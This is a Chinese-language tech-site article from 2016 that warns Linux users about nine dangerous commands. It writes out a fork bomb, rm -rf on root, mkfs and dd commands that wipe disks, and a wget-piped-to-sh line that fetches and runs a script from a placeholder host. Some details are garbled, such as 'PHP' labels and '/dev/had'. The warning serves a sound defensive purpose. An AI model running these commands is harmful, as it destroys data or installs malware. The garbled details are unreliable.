<meter id="pryje"><nav id="pryje"><delect id="pryje"></delect></nav></meter>
          <label id="pryje"></label>

          新聞中心

          EEPW首頁(yè) > 嵌入式系統(tǒng) > 設(shè)計(jì)應(yīng)用 > 9個(gè)必須時(shí)刻警惕的Linux命令&代碼

          9個(gè)必須時(shí)刻警惕的Linux命令&代碼

          作者: 時(shí)間:2016-09-12 來(lái)源:網(wǎng)絡(luò) 收藏

          概述: shell/terminal命令非常強(qiáng)大,即使一個(gè)簡(jiǎn)單的命令就可能導(dǎo)致文件夾、文件或者路徑文件夾等被刪除。為了避免這樣的事情發(fā)生,我們應(yīng)該時(shí)刻注意PHP代碼命令,今天為大家?guī)?lái)9個(gè)必須時(shí)刻警惕的命令代碼。

          本文引用地址:http://www.ex-cimer.com/article/201609/304206.htm

          shell/terminal命令非常強(qiáng)大,即使一個(gè)簡(jiǎn)單的命令就可能導(dǎo)致文件夾、文件或者路徑文件夾等被刪除。

          在一些情況下,Linux甚至不會(huì)詢問(wèn)你而直接執(zhí)行命令,導(dǎo)致你丟失各種數(shù)據(jù)信息。

          一般來(lái)說(shuō)在Web上推薦新的Linux用戶執(zhí)行這些命令,當(dāng)然,也有人哪些寫過(guò)這代碼的人不這么想,因?yàn)檫@玩意你一寫下去就不是玩笑了。

          9個(gè)必須時(shí)刻警惕的PHP命令代碼

          這里我收集了一些對(duì)系統(tǒng)有危害的Linux代碼,幫助你避免他們。請(qǐng)記住:這些代碼非常危險(xiǎn),甚至可以經(jīng)過(guò)修改,變得更加有危害性。

          還有一些事情需要注意:一些命令只在Ubuntu中有sudo前綴時(shí)是有危害的。其他發(fā)行版本的Linux,則是在作為根目錄命令時(shí)會(huì)有危害。

          1. Linux Fork Bomb Command

          :(){ :|: };:以Fork Bomb聞名,是一個(gè)拒絕服務(wù)攻擊 的Linux 系統(tǒng)。:(){ :|: };:是一個(gè)bash函數(shù)。只要被執(zhí)行,他會(huì)不斷重復(fù),直到系統(tǒng)被凍結(jié)。

          你只能重啟系統(tǒng)解決這個(gè)問(wèn)題。所以當(dāng)你在Linux界面執(zhí)行這個(gè)命令時(shí)一定要注意。

          2. Mv Folder/Dev/Null Command

          mv folder/dev/null也是一個(gè)危險(xiǎn)的命令。Dev/null 或者 null device 是一個(gè)刪除所有寫在這個(gè)設(shè)備文件上數(shù)據(jù)的設(shè)備文件,但是,該操作提示卻是寫入操作執(zhí)行成功。這就是我們常說(shuō)的bit bucked 或者 black hole。

          3. Rm -Rf Command

          rm -rf命令在Linux系統(tǒng)中可以快速刪除文件夾及其內(nèi)容。如果,你不知道如何正確使用它,你就只有哭了。

          列下m-rf 命令最常見(jiàn)的組合和選擇:

          rm command :刪除Linux系統(tǒng)的文件

          rm -f command:不需提示,刪除文件中的只讀文件

          rm -r command 循環(huán)刪除文件夾的內(nèi)容

          rm -d command :刪除空目錄,如果非空目錄則不會(huì)執(zhí)行該操作

          rm -rf/ command:強(qiáng)制刪除根目錄中的所有內(nèi)容和子文件夾(包括寫保護(hù)文件)命令。

          rm -rf* command :強(qiáng)制刪除當(dāng)前目錄中的所有內(nèi)容(當(dāng)前工作目錄)和字文件夾

          rm -rf. command:強(qiáng)制刪除當(dāng)前文件夾目錄/子目錄中的所有內(nèi)容 。同rm -r.[^.]*

          The rm -r.[^.]* command :刪除文件及文件夾,帶有刪除提示

          4. Mkfs Command

          如果你不知mkfs的作用,那么它也是一個(gè)危險(xiǎn)的命令,mkfs之后寫的任何命令都將會(huì)被一個(gè)空白的linux文件系統(tǒng)格式化、替代。

          下面列舉出需要管理員權(quán)限,格式化硬盤的命令:

          mkfs

          mkfs.ext3

          mkfs.bfs

          mkfs.ext2

          mkfs.minix

          mkfs.msdos mkfs.reiserfs

          mkfs.vfat

          mkfs.cramfs也可以和上面的代碼做同樣的事情,不過(guò)不需要管理源權(quán)限。

          5. Tar Bomb

          tar命令用于將多個(gè)文件以.tar格式放入一個(gè)文件中(存檔文件)。Tape Archive (Tar) bomb可以由他創(chuàng)建。

          當(dāng)為壓縮時(shí),就是這個(gè)存檔文件生成數(shù)以萬(wàn)計(jì)的相似名稱文件出現(xiàn)在當(dāng)前目錄中而不是新目錄。

          當(dāng)收到tar文件,定期創(chuàng)建一個(gè)新的保護(hù)目錄,然后在解壓前將接受的tar文件放到這個(gè)目錄中,你可以避免成為tar bomb的受害者。

          6. Dd Command

          Dd命令用于復(fù)制改變硬盤分區(qū)。如果,你用錯(cuò)地方了,那么也很危險(xiǎn)。

          下面列舉dd命令:

          dd if=/dev/hda of=/dev/hdb

          dd if=/dev/hda of=/dev/sdb

          dd if=something of=/dev/hda

          dd if=something of=/dev/sda

          下面這個(gè)命令會(huì)將整個(gè)主硬盤清零:dd if=/dev/zero of=/dev/had

          7. Shell Script Code

          有時(shí)候,你可能會(huì)被人坑,給你一個(gè)shell腳本文件,讓你去下載并執(zhí)行它。該腳本可能會(huì)包含一些惡意的或危險(xiǎn)的代碼。命令形式可能會(huì)是這樣:wget http://some_malicious_source -O- | sh。 wget將會(huì)在sh狹隘腳本時(shí)下載腳本。

          8. Malicious Source Code

          也許有人會(huì)給你源代碼讓你編譯他。代碼可能是正常代碼,不過(guò),有一些惡意代碼偽裝在大型源代碼中,如果是這樣,你的系統(tǒng)就中槍了。如何避免?僅接受并編譯可信賴來(lái)源的源代碼。

          9. Decompression Bomb

          你已經(jīng)收到一個(gè)壓縮文件,你被要求提取這個(gè)看起來(lái)很小的文件,可能小到KB。事實(shí)上,該小尺寸的壓縮文件包含高度壓縮數(shù)據(jù)。

          只要文件解壓,上百GB數(shù)據(jù)會(huì)被提取,這時(shí)候,過(guò)大的數(shù)據(jù)填滿硬盤導(dǎo)致宕機(jī),幾率就很大了。



          關(guān)鍵詞: Linux 命令&代碼

          評(píng)論


          相關(guān)推薦

          技術(shù)專區(qū)

          關(guān)閉
          看屁屁www成人影院,亚洲人妻成人图片,亚洲精品成人午夜在线,日韩在线 欧美成人 (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })();